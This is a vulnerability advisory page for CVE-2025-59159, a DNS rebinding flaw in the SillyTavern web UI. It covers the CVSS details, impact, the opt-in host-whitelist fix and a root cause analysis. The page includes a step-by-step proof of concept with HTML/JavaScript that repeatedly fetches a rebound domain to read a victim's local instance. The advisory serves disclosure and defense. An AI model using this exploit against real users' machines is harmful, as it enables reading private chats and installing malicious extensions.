9.7

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-59159

GHSA ID

GHSA-7cxj-w27x-x78q

EPSS Score

CWE

CWE-346

Published

10/6/2025

Updated

10/6/2025

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-59159

CVE-2025-59159: SillyTavern Web Interface Vulnerable DNS Rebinding

Summary

The web UI for SillyTavern is susceptible to DNS rebinding, allowing attackers to perform actions like install malicious extensions, read chats, inject arbitrary HTML for phishing, etc.

Details

DNS rebinding is a method to bypass the CORS policies by tricking the browser into resolving something like 127.0.0.1 for a site's DNS address. This allows anybody to get remote access to anyone's SillyTavern instance without it being exposed, just by visiting a website.

PoC

Host the PoC HTML file on a /rebind.html endpoint (or any other endpoint) on a web server on port 8000
Go to https://lock.cmpxchg8b.com/rebinder.html and input your IP address (A) to rebind to 127.0.0.1 (B)
Replace the URL in the HTML with the returned URL on the site
Go to http://[URL]:8000/rebind.html in firefox or on any mobile browser if you're using termux
Check the developer tools console. It should return all of the data

Here is the PoC code:

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Rebind Payload</title>
</head>
<body>
<script>
async function tryRebind() {
  while (true) {
    try {
      let res = await fetch("http://[DOMAIN HERE]:8000/");
      let text = await res.text();

      if (text.includes("Directory listing for /")) {
        console.log("Still attacker server, retrying...");
        await new Promise(r => setTimeout(r, 2000));
        continue;  // don't break yet
      }

      console.log("GOT VICTIM RESPONSE!");
      console.log(text.substring(0, 300));
      break;

    } catch (e) {
      console.log("Fetch failed, retrying...", e);
      await new Promise(r => setTimeout(r, 2000));
    }
  }
}
tryRebind();
</script>
</body>
</html>

Impact

Attackers can read user chats, inject HTML for stuff like phishing, download arbitrary malicious extensions, etc. Essentially gaining full control over users' SillyTavern systems.

Resolution

A vulnerability has been patched in the version 1.13.4 by introducing a server configuration setting that enables a validation of host names in inbound HTTP requests according to the provided list of allowed hosts: hostWhitelist.enabled in config.yaml file or SILLYTAVERN_HOSTWHITELIST_ENABLED environment variable.

While the setting is disabled by default to honor a wide variety of existing user configurations and maintain backwards compatibility, existing and new users are encouraged to review their server configurations and apply necessary changes to their setup, especially if hosting over the local network while not using SSL.

Resources

https://github.com/SillyTavern/SillyTavern/commit/d134abd50e4a416e3b81233242583b0a23f38320

(GitHub Advisory)

9.7

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-59159

GHSA ID

GHSA-7cxj-w27x-x78q

EPSS Score

CWE

CWE-346

Published

10/6/2025

Updated

10/6/2025

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
sillytavern	npm	< 1.13.4	1.13.4

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is a classic DNS rebinding attack. The root cause is the SillyTavern server's failure to validate the Host header of incoming HTTP requests. An attacker can leverage this by having a victim visit a malicious website. This website's domain initially resolves to the attacker's server, but then, after a short TTL, it rebinds to 127.0.0.1. The malicious JavaScript, now running on a domain that points to the local SillyTavern instance, can make arbitrary API calls, effectively giving the attacker full control over the user's SillyTavern.

The provided patch addresses this by introducing a middleware, hostWhitelistMiddleware, in src/middleware/hostWhitelist.js. This middleware is added to the main Express application stack in src/server-main.js to intercept all incoming requests.

The function hostWhitelistMiddleware is the critical component in the context of this vulnerability. It is designed to check the Host header against a configurable whitelist. However, the patch makes this feature opt-in (hostWhitelist.enabled is false by default). When the feature is disabled, the middleware directly calls next(), allowing the request to be processed by the downstream API endpoints without any host validation. This means that even with the patched code, a default installation remains vulnerable.

During an exploit, the attacker's script would make requests to various API endpoints. Every one of these malicious requests would first pass through the hostWhitelistMiddleware. Because this function is the gatekeeper that fails to stop the malicious request (when disabled), it is the most relevant function to identify for profiling and runtime analysis. Any subsequent function in the stack that processes the request (e.g., for reading chats, installing extensions) is being subjected to the exploit because of the initial failure in hostWhitelistMiddleware.

Vulnerable functions

hostWhitelistMiddleware

src/middleware/hostWhitelist.js

The vulnerability is a DNS rebinding issue, which stems from the application's failure to validate the `Host` header of incoming HTTP requests. This allows an attacker-controlled website to make requests to the SillyTavern server as if they were from the local machine, bypassing the browser's Same-Origin Policy. The patch introduces the `hostWhitelistMiddleware` as a mitigation. This function inspects the `Host` header of every request. However, the advisory notes that this feature is disabled by default for backward compatibility (`hostWhitelist.enabled: false`). When disabled, the middleware simply calls `next()`, passing the request down the chain to the application's route handlers without any validation. Therefore, any request handled by the application is potentially malicious, and this middleware is the entry point for that request into the application logic where the validation *should* occur. During exploitation, this function will be in the call stack for every incoming request from the attacker.

WAF Protection Rules

WAF Rule

### Summ*ry T** w** UI *or SillyT*v*rn is sus**pti*l* to *NS r**in*in*, *llowin* *tt**k*rs to p*r*orm **tions lik* inst*ll m*li*ious *xt*nsions, r*** ***ts, inj**t *r*itr*ry *TML *or p*is*in*, *t*. ### **t*ils *NS r**in*in* is * m*t*o* to *yp*ss t**

Reasoning

T** vuln*r**ility is * *l*ssi* *NS r**in*in* *tt**k. T** root **us* is t** SillyT*v*rn s*rv*r's **ilur* to v*li**t* t** `*ost` *****r o* in*omin* *TTP r*qu*sts. *n *tt**k*r **n l*v*r*** t*is *y **vin* * vi*tim visit * m*li*ious w**sit*. T*is w**sit*'

9.7

Basic Information

Concerned about an active attack path?

CVE-2025-59159: SillyTavern Web Interface Vulnerable DNS Rebinding

Summary

Details

PoC

Impact

Resolution

Resources

9.7

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI